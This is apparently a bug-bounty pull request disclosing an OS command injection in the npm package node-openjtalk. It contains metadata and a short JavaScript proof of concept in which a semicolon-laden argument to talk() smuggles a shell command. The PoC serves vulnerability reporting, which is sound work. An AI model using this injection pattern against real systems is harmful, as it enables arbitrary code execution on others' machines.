### PR TITLE
Arbitary code exection in node-openjtalk

### DIFF
--- a/bounties/npm/node-openjtalk/1/README.md
+++ b/bounties/npm/node-openjtalk/1/README.md
@@ -1,0 +1,12 @@
+# Overview
+
+`openjtalk` is a free japanese speech synthesis tool in Nodejs.
+Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the key values, using the `talk()` fucntion.
+
+# Proof of Concept
+
+```js
+var OpenJTalk = require('openjtalk');
+var mei = new OpenJTalk();
+mei.talk(' "; touch HACKED; #//');
+```

--- a/bounties/npm/node-openjtalk/1/vulnerability.json
+++ b/bounties/npm/node-openjtalk/1/vulnerability.json
@@ -1,0 +1,51 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-09-18",
+    "AffectedVersionRange": "*",
+    "Summary": "Command Injection",
+    "Contributor": {
+        "Discloser": "Asjidkalam",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "node-openjtalk",
+        "URL": "https://github.com/hecomi/node-openjtalk",
+        "Downloads": ""
+    },
+    "CWEs": [
+        {
+            "ID": "78",
+            "Description": "OS command injection"
+        }
+    ],
+    "CVSS": {
+        "Version": "",
+        "AV": "",
+        "AC": "",
+        "PR": "",
+        "UI": "",
+        "S": "",
+        "C": "",
+        "I": "",
+        "A": "",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "6.7"
+    },
+    "CVEs": [],
+    "Repository": {
+        "URL": "https://github.com/hecomi/node-openjtalk",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "hecomi",
+        "Name": "node-openjtalk",
+        "Forks": "",
+        "Stars": ""
+    },
+    "Permalinks": [
+        "https://github.com/hecomi/node-openjtalk/blob/master/openjtalk.js#L94"
+    ]
+}


### PR DESCRIPTION
## ✍️ Description

`openjtalk` is a free japanese speech synthesis tool in Nodejs.
Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the key values, using the `talk()` fucntion.


## 🕵️‍♂️ Proof of Concept

Install the package, run the below code:
```javascript
var OpenJTalk = require('openjtalk');
var mei = new OpenJTalk();
mei.talk(' "; touch HACKED; #//');
```

![image](https://user-images.githubusercontent.com/16708391/93517722-81925080-f949-11ea-97bb-0a41fb8a3f18.png)


## 💥 Impact
Perform code execution on the system.

## ✅ Checklist
- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_